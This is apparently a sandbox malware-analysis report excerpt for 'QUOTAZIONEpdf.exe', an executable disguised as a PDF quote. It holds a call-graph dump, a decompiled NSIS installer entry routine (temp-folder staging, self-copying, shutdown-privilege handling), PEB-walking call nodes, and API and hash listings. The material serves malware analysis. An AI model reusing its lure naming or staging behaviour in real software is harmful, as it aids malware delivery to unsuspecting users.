3811->3813 3812->3657 3813->3812 3815 401389 2 API calls 3814->3815 3816 401420 3815->3816 3816->3623 3817->3676 3818->3678 3820 4055cc 3819->3820 3821 4055d1 CharPrevA 3820->3821 3822 402cc7 3820->3822 3821->3820 3821->3822 3823 405a85 lstrcpynA 3822->3823 3823->3682 3824->3692 3825->3700 3827 4038ab 3826->3827 3844 4059e3 wsprintfA 3827->3844 3829 40391c 3830 405aa7 18 API calls 3829->3830 3831 403928 SetWindowTextA 3830->3831 3832 403944 3831->3832 3833 40365e 3831->3833 3832->3833 3834 405aa7 18 API calls 3832->3834 3833->3717 3834->3832 3835->3713 3836->3719 3845 403e83 3837->3845 3839 404f18 3843 404f3f 3839->3843 3848 401389 3839->3848 3840 403e83 SendMessageA 3841 404f51 OleUninitialize 3840->3841 3841->3751 3843->3840 3844->3829 3846 403e9b 3845->3846 3847 403e8c SendMessageA 3845->3847 3846->3839 3847->3846 3850 401390 3848->3850 3849 4013fe 3849->3839 3850->3849 3851 4013cb MulDiv SendMessageA 3850->3851 3851->3850 3852->3762 3854 405659 18 API calls 3853->3854 3855 4053be 3854->3855 3856 4053c7 DeleteFileA 3855->3856 3857 4053de 3855->3857 3858 403416 OleUninitialize 3856->3858 3859 40551d 3857->3859 3894 405a85 lstrcpynA 3857->3894 3858->3621 3858->3622 3859->3858 3865 405d7c 2 API calls 3859->3865 3861 405408 3862 405419 3861->3862 3863 40540c lstrcatA 3861->3863 3864 4055bf 2 API calls 3862->3864 3866 40541f 3863->3866 3864->3866 3868 405538 3865->3868 3867 40542d lstrcatA 3866->3867 3869 405438 lstrlenA FindFirstFileA 3866->3869 3867->3869 3868->3858 3871 405578 3 API calls 3868->3871 3870 405513 3869->3870 3892 40545c 3869->3892 3870->3859 3873 405542 3871->3873 3872 4055a3 CharNextA 3872->3892 3874 40573d 2 API calls 3873->3874 3875 405548 RemoveDirectoryA 3874->3875 3876 405553 3875->3876 3877 40556a 3875->3877 3876->3858 3879 405559 3876->3879 3880 404e23 25 API calls 3877->3880 3882 404e23 25 API calls 3879->3882 3880->3858 3881 4054f2 FindNextFileA 3883 40550a FindClose 3881->3883 3881->3892 3884 405561 3882->3884 3883->3870 3885 4057d3 38 API calls 3884->3885 3888 405568 3885->3888 3886 40573d 2 API calls 3889 4054bf DeleteFileA 3886->3889 3887 4053aa 59 API calls 3887->3892 3888->3858 3889->3892 3890 404e23 25 API calls 3890->3881 3891 404e23 25 API calls 3891->3892 3892->3872 3892->3881 3892->3886 3892->3887 3892->3890 3892->3891 3893 4057d3 38 API calls 3892->3893 3895 405a85 lstrcpynA 3892->3895 3893->3892 3894->3861 3895->3892 3896->3792 3897->3798 3899 405707 lstrlenA 3898->3899 3900 405711 3899->3900 3901 4056e5 lstrcmpiA 3899->3901 3900->3805 3900->3806 3901->3900 3902 4056fe CharNextA 3901->3902 3902->3899 3903->3809 4755 401ca5 4756 4029cb 18 API calls 4755->4756 4757 401cb5 SetWindowLongA 4756->4757 4758 40287d 4757->4758 4759 401a26 4760 4029cb 18 API calls 4759->4760 4761 401a2c 4760->4761 4762 4029cb 18 API calls 4761->4762 4763 4019d6 4762->4763 4764 4045aa 4765 4045d6 4764->4765 4766 4045ba 4764->4766 4767 404609 4765->4767 4768 4045dc SHGetPathFromIDListA 4765->4768 4775 40532a GetDlgItemTextA 4766->4775 4770 4045f3 SendMessageA 4768->4770 4771 4045ec 4768->4771 4770->4767 4773 40140b 2 API calls 4771->4773 4772 4045c7 SendMessageA 4772->4765 4773->4770 4775->4772 4776 19eb75 4781 19ea5f GetPEB 4776->4781 4778 19ed2d 4779 19ebda 4779->4778 4782 19f1b5 4779->4782 4781->4779 4796 19ea5f GetPEB 4782->4796 4784 19f20c 4785 19f2f7 4784->4785 4787 19f304 4784->4787 4795 19f2ba 4784->4795 4786 19f4dd 5 API calls 4785->4786 4786->4795 4788 19e5ff 4 API calls 4787->4788 4787->4795 4789 19f40a 4788->4789 4790 19f477 4789->4790 4791 19e5ff 4 API calls 4789->4791 4789->4795 4792 19e5ff 4 API calls 4790->4792 4791->4789 4793 19f496 4792->4793 4794 19e54e 4 API calls 4793->4794 4793->4795 4794->4795 4795->4778 4796->4784 4797 402b2d 4798 402b55 4797->4798 4799 402b3c SetTimer 4797->4799 4800 402ba3 4798->4800 4801 402ba9 MulDiv 4798->4801 4799->4798 4802 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4801->4802 4802->4800 4804 401bad 4805 4029cb 18 API calls 4804->4805 4806 401bb4 4805->4806 4807 4029cb 18 API calls 4806->4807 4808 401bbe 4807->4808 4809 401bce 4808->4809 4811 4029e8 18 API calls 4808->4811 4810 401bde 4809->4810 4812 4029e8 18 API calls 4809->4812 4813 401be9 4810->4813 4814 401c2d 4810->4814 4811->4809 4812->4810 4815 4029cb 18 API calls 4813->4815 4816 4029e8 18 API calls 4814->4816 4817 401bee 4815->4817 4818 401c32 4816->4818 4819 4029cb 18 API calls 4817->4819 4820 4029e8 18 API calls 4818->4820 4822 401bf7 4819->4822 4821 401c3b FindWindowExA 4820->4821 4825 401c59 4821->4825 4823 401c1d SendMessageA 4822->4823 4824 401bff SendMessageTimeoutA 4822->4824 4823->4825 4824->4825 4826 40422e 4827 404264 4826->4827 4828 40423e 4826->4828 4830 403e9e 8 API calls 4827->4830 4829 403e37 19 API calls 4828->4829 4831 40424b SetDlgItemTextA 4829->4831 4832 404270 4830->4832 4831->4827 4833 402630 4834 4029e8 18 API calls 4833->4834 4835 402637 FindFirstFileA 4834->4835 4836 40265a 4835->4836 4840 40264a 4835->4840 4837 402661 4836->4837 4841 4059e3 wsprintfA 4836->4841 4842 405a85 lstrcpynA 4837->4842 4841->4837 4842->4840 4850 4024b0 4851 4024b5 4850->4851 4852 4024c6 4850->4852 4853 4029cb 18 API calls 4851->4853 4854 4029e8 18 API calls 4852->4854 4855 4024bc 4853->4855 4856 4024cd lstrlenA 4854->4856 4857 4024ec WriteFile 4855->4857 4858 40264e 4855->4858 4856->4855 4857->4858 3451 4015b3 3452 4029e8 18 API calls 3451->3452 3453 4015ba 3452->3453 3469 40560c CharNextA CharNextA 3453->3469 3455 40160a 3456 40160f 3455->3456 3459 40162d 3455->3459 3458 401423 25 API calls 3456->3458 3457 4055a3 CharNextA 3460 4015d0 CreateDirectoryA 3457->3460 3461 401616 3458->3461 3462 401423 25 API calls 3459->3462 3463 4015c2 3460->3463 3464 4015e5 GetLastError 3460->3464 3475 405a85 lstrcpynA 3461->3475 3468 40215b 3462->3468 3463->3455 3463->3457 3464->3463 3466 4015f2 GetFileAttributesA 3464->3466 3466->3463 3467 401621 SetCurrentDirectoryA 3467->3468 3470 405626 3469->3470 3474 405632 3469->3474 3471 40562d CharNextA 3470->3471 3470->3474 3472 40564f 3471->3472 3472->3463 3473 4055a3 CharNextA 3473->3474 3474->3472 3474->3473 3475->3467 3476 401734 3477 4029e8 18 API calls 3476->3477 3478 40173b 3477->3478 3479 401761 3478->3479 3480 401759 3478->3480 3531 405a85 lstrcpynA 3479->3531 3530 405a85 lstrcpynA 3480->3530 3483 40175f 3487 405ce3 5 API calls 3483->3487 3484 40176c 3532 405578 lstrlenA CharPrevA 3484->3532 3507 40177e 3487->3507 3491 401795 CompareFileTime 3491->3507 3492 401859 3494 404e23 25 API calls 3492->3494 3493 401830 3495 404e23 25 API calls 3493->3495 3503 401845 3493->3503 3497 401863 3494->3497 3495->3503 3496 405a85 lstrcpynA 3496->3507 3515 402f01 3497->3515 3500 40188a SetFileTime 3501 40189c FindCloseChangeNotification 3500->3501 3501->3503 3504 4018ad 3501->3504 3502 405aa7 18 API calls 3502->3507 3505 4018b2 3504->3505 3506 4018c5 3504->3506 3508 405aa7 18 API calls 3505->3508 3509 405aa7 18 API calls 3506->3509 3507->3491 3507->3492 3507->3493 3507->3496 3507->3502 3514 40575c GetFileAttributesA CreateFileA 3507->3514 3535 405d7c FindFirstFileA 3507->3535 3538 40573d GetFileAttributesA 3507->3538 3541 405346 3507->3541 3511 4018ba lstrcatA 3508->3511 3512 4018cd 3509->3512 3511->3512 3513 405346 MessageBoxIndirectA 3512->3513 3513->3503 3514->3507 3516 402f12 SetFilePointer 3515->3516 3517 402f2e 3515->3517 3516->3517 3545 40302c GetTickCount 3517->3545 3520 402f3f ReadFile 3521 402f5f 3520->3521 3526 401876 3520->3526 3522 40302c 42 API calls 3521->3522 3521->3526 3523 402f76 3522->3523 3524 402ff1 ReadFile 3523->3524 3523->3526 3528 402f86 3523->3528 3524->3526 3526->3500 3526->3501 3527 402fa1 ReadFile 3527->3526 3527->3528 3528->3526 3528->3527 3529 402fba WriteFile 3528->3529 3529->3526 3529->3528 3530->3483 3531->3484 3533 405592 lstrcatA 3532->3533 3534 401772 lstrcatA 3532->3534 3533->3534 3534->3483 3536 405d92 FindClose 3535->3536 3537 405d9d 3535->3537 3536->3537 3537->3507 3539 405759 3538->3539 3540 40574c SetFileAttributesA 3538->3540 3539->3507 3540->3539 3542 40535b 3541->3542 3543 4053a7 3542->3543 3544 40536f MessageBoxIndirectA 3542->3544 3543->3507 3544->3543 3546 403196 3545->3546 3547 40305b 3545->3547 3549 402bc5 32 API calls 3546->3549 3558 4031da SetFilePointer 3547->3558 3554 402f37 3549->3554 3550 403066 SetFilePointer 3555 40308b 3550->3555 3554->3520 3554->3526 3555->3554 3556 403120 WriteFile 3555->3556 3557 403177 SetFilePointer 3555->3557 3559 4031a8 ReadFile 3555->3559 3561 405e9d 3555->3561 3568 402bc5 3555->3568 3556->3554 3556->3555 3557->3546 3558->3550 3560 4031c9 3559->3560 3560->3555 3562 405ec2 3561->3562 3563 405eca 3561->3563 3562->3555 3563->3562 3564 405f51 GlobalFree 3563->3564 3565 405f5a GlobalAlloc 3563->3565 3566 405fd1 GlobalAlloc 3563->3566 3567 405fc8 GlobalFree 3563->3567 3564->3565 3565->3562 3565->3563 3566->3562 3566->3563 3567->3566 3569 402bd3 3568->3569 3570 402beb 3568->3570 3571 402be3 3569->3571 3572 402bdc DestroyWindow 3569->3572 3573 402bf3 3570->3573 3574 402bfb GetTickCount 3570->3574 3571->3555 3572->3571 3583 405ddc 3573->3583 3574->3571 3576 402c09 3574->3576 3577 402c11 3576->3577 3578 402c3e CreateDialogParamA 3576->3578 3577->3571 3587 402ba9 3577->3587 3578->3571 3580 402c1f wsprintfA 3581 404e23 25 API calls 3580->3581 3582 402c3c 3581->3582 3582->3571 3584 405df9 PeekMessageA 3583->3584 3585 405e09 3584->3585 3586 405def DispatchMessageA 3584->3586 3585->3571 3586->3584 3588 402bb8 3587->3588 3589 402bba MulDiv 3587->3589 3588->3589 3589->3580 4859 401634 4860 4029e8 18 API calls 4859->4860 4861 40163a 4860->4861 4862 405d7c 2 API calls 4861->4862 4863 401640 4862->4863 4864 401934 4865 4029cb 18 API calls 4864->4865 4866 40193b 4865->4866 4867 4029cb 18 API calls 4866->4867 4868 401945 4867->4868 4869 4029e8 18 API calls 4868->4869 4870 40194e 4869->4870 4871 401961 lstrlenA 4870->4871 4873 40199c 4870->4873 4872 40196b 4871->4872 4872->4873 4877 405a85 lstrcpynA 4872->4877 4875 401985 4875->4873 4876 401992 lstrlenA 4875->4876 4876->4873 4877->4875 4878 4019b5 4879 4029e8 18 API calls 4878->4879 4880 4019bc 4879->4880 4881 4029e8 18 API calls 4880->4881 4882 4019c5 4881->4882 4883 4019cc lstrcmpiA 4882->4883 4884 4019de lstrcmpA 4882->4884 4885 4019d2 4883->4885 4884->4885 4886 4014b7 4887 4014bd 4886->4887 4888 401389 2 API calls 4887->4888 4889 4014c5 4888->4889 4890 4025be 4891 4025c5 4890->4891 4893 40282a 4890->4893 4892 4029cb 18 API calls 4891->4892 4894 4025d0 4892->4894 4895 4025d7 SetFilePointer 4894->4895 4895->4893 4896 4025e7 4895->4896 4898 4059e3 wsprintfA 4896->4898 4898->4893 4899 40673f 4902 405ed0 4899->4902 4900 405f51 GlobalFree 4901 405f5a GlobalAlloc 4900->4901 4901->4902 4903 40683b 4901->4903 4902->4900 4902->4901 4902->4902 4902->4903 4904 405fd1 GlobalAlloc 4902->4904 4905 405fc8 GlobalFree 4902->4905 4904->4902 4904->4903 4905->4904

                Executed Functions

                Function 00403225, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 403225-4032ba #17 SetErrorMode OleInitialize call 405da3 SHGetFileInfoA call 405a85 GetCommandLineA call 405a85 GetModuleHandleA 7 4032c6-4032db call 4055a3 CharNextA 0->7 8 4032bc-4032c1 0->8 11 403340-403344 7->11 8->7 12 403346 11->12 13 4032dd-4032e0 11->13 16 403359-403371 GetTempPathA call 4031f1 12->16 14 4032e2-4032e6 13->14 15 4032e8-4032f0 13->15 14->14 14->15 17 4032f2-4032f3 15->17 18 4032f8-4032fb 15->18 26 403393-4033aa DeleteFileA call 402c5b 16->26 27 403373-403391 GetWindowsDirectoryA lstrcatA call 4031f1 16->27 17->18 20 403330-40333d call 4055a3 18->20 21 4032fd-403301 18->21 20->11 34 40333f 20->34 24 403311-403317 21->24 25 403303-40330c 21->25 31 403327-40332e 24->31 32 403319-403322 24->32 25->24 29 40330e 25->29 39 403411-403420 call 4035a6 OleUninitialize 26->39 40 4033ac-4033b2 26->40 27->26 27->39 29->24 31->20 37 403348-403354 call 405a85 31->37 32->31 36 403324 32->36 34->11 36->31 37->16 50 403426-403436 call 405346 ExitProcess 39->50 51 40350b-403511 39->51 42 403401-403408 call 4035e3 40->42 43 4033b4-4033bd call 4055a3 40->43 48 40340d 42->48 54 4033c8-4033ca 43->54 48->39 52 403513-403530 call 405da3 * 3 51->52 53 40358e-403596 51->53 81 403532-403534 52->81 82 40357a-403585 ExitWindowsEx 52->82 57 403598 53->57 58 40359c-4035a0 ExitProcess 53->58 59 4033cc-4033d6 54->59 60 4033bf-4033c5 54->60 57->58 64 4033d8-4033e5 call 405659 59->64 65 40343c-403456 lstrcatA lstrcmpiA 59->65 60->59 63 4033c7 60->63 63->54 64->39 74 4033e7-4033fd call 405a85 * 2 64->74 65->39 68 403458-40346d CreateDirectoryA SetCurrentDirectoryA 65->68 71 40347a-403494 call 405a85 68->71 72 40346f-403475 call 405a85 68->72 80 403499-4034b5 call 405aa7 DeleteFileA 71->80 72->71 74->42 92 4034f6-4034fd 80->92 93 4034b7-4034c7 CopyFileA 80->93 81->82 86 403536-403538 81->86 82->53 85 403587-403589 call 40140b 82->85 85->53 86->82 90 40353a-40354c GetCurrentProcess 86->90 90->82 98 40354e-403570 90->98 92->80 96 4034ff-403506 call 4057d3 92->96 93->92 94 4034c9-4034e9 call 4057d3 call 405aa7 call 4052e5 93->94 94->92 107 4034eb-4034f2 CloseHandle 94->107 96->39 98->82 107->92
                C-Code - Quality: 82%
                			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\hardz\\Desktop\\QUOTAZIONEpdf.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\hardz\\Desktop\\QUOTAZIONEpdf.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", "C:\\Users\\hardz\\Desktop");
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\QUOTAZIONEpdf.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}






































                0x00403231
                0x00403235
                0x0040323d
                0x0040323f
                0x00403244
                0x0040324f
                0x00403256
                0x0040325e
                0x00403268
                0x0040327e
                0x0040328e
                0x00403293
                0x00403299
                0x004032a0
                0x004032b3
                0x004032b8
                0x004032ba
                0x004032bc
                0x004032c1
                0x004032c1
                0x004032d1
                0x004032d7
                0x00403340
                0x00403340
                0x00403342
                0x00403344
                0x00000000
                0x00000000
                0x004032dd
                0x004032e0
                0x004032e8
                0x004032e8
                0x004032eb
                0x004032f0
                0x004032f2
                0x004032f2
                0x004032f3
                0x004032f3
                0x004032f8
                0x004032fb
                0x00403330
                0x00403335
                0x0040333a
                0x0040333d
                0x0040333f
                0x0040333f
                0x0040333f
                0x00000000
                0x004032fd
                0x004032fd
                0x004032fe
                0x00403301
                0x00403309
                0x0040330c
                0x0040330e
                0x0040330e
                0x0040330e
                0x0040330c
                0x00403311
                0x00403317
                0x0040331f
                0x00403322
                0x00403324
                0x00403324
                0x00403324
                0x00403322
                0x00403327
                0x0040332e
                0x00403348
                0x0040334b
                0x00403354
                0x00403359
                0x00403359
                0x00403364
                0x0040336a
                0x0040336f
                0x00403371
                0x00403393
                0x00403398
                0x0040339f
                0x004033a6
                0x004033aa
                0x00403411
                0x00403411
                0x00403416
                0x00403420
                0x0040350b
                0x00403511
                0x0040351c
                0x00403525
                0x00403527
                0x0040352c
                0x0040352e
                0x00403530
                0x00403532
                0x00403534
                0x00403536
                0x00403538
                0x00403548
                0x0040354a
                0x0040354c
                0x00403559
                0x00403568
                0x00403570
                0x00403578
                0x00403578
                0x0040354c
                0x00403538
                0x00403534
                0x0040357d
                0x00403583
                0x00403585
                0x00403589
                0x00403589
                0x00403585
                0x0040358e
                0x00403593
                0x00403596
                0x00403598
                0x00403598
                0x004035a0
                0x004035a0
                0x0040342f
                0x00403436
                0x00403436
                0x004033b2
                0x00403401
                0x00403401
                0x0040340d
                0x00000000
                0x0040340d
                0x004033bb
                0x004033c8
                0x004033bf
                0x004033c5
                0x00000000
                0x00000000
                0x004033c7
                0x004033c7
                0x004033c7
                0x004033cc
                0x004033ce
                0x004033d6
                0x00403442
                0x00403456
                0x00000000
                0x00000000
                0x0040345a
                0x00403461
                0x00403467
                0x0040346d
                0x00403475
                0x00403475
                0x00403483
                0x0040348a
                0x00403493
                0x00403499
                0x004034a5
                0x004034ab
                0x004034b5
                0x004034c9
                0x004034ca
                0x004034cb
                0x004034dc
                0x004034e2
                0x004034e9
                0x004034ec
                0x004034f2
                0x004034f2
                0x004034e9
                0x004034f6
                0x004034fc
                0x004034fc
                0x004034ff
                0x00403500
                0x00403501
                0x00000000
                0x00403501
                0x004033d8
                0x004033da
                0x004033e5
                0x00000000
                0x00000000
                0x004033ed
                0x004033f8
                0x004033fd
                0x00000000
                0x004033fd
                0x00403379
                0x00403385
                0x0040338a
                0x0040338f
                0x00403391
                0x00000000
                0x00000000
                0x00000000
                0x00403391
                0x00000000
                0x0040332e
                0x00000000
                0x00000000
                0x00000000
                0x004032e2
                0x004032e2
                0x004032e2
                0x004032e3
                0x004032e3
                0x00000000
                0x004032e2
                0x00000000

                APIs
                • #17.COMCTL32 ref: 00403244
                • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                • OleInitialize.OLE32(00000000), ref: 00403256
                  • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                  • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                  • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                  • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,00000000), ref: 004032A6
                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,00000020), ref: 004032D1
                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                • DeleteFileA.KERNELBASE(1033), ref: 00403398
                • OleUninitialize.OLE32(00000000), ref: 00403416
                • ExitProcess.KERNEL32 ref: 00403436
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,00000000,00000000), ref: 00403442
                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,00000000,00000000), ref: 0040344E
                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                • CopyFileA.KERNEL32(C:\Users\user\Desktop\QUOTAZIONEpdf.exe,0041F050,00000001), ref: 004034BF
                • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                • ExitProcess.KERNEL32 ref: 004035A0
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\QUOTAZIONEpdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                • API String ID: 2278157092-678278877
                • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004053AA, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
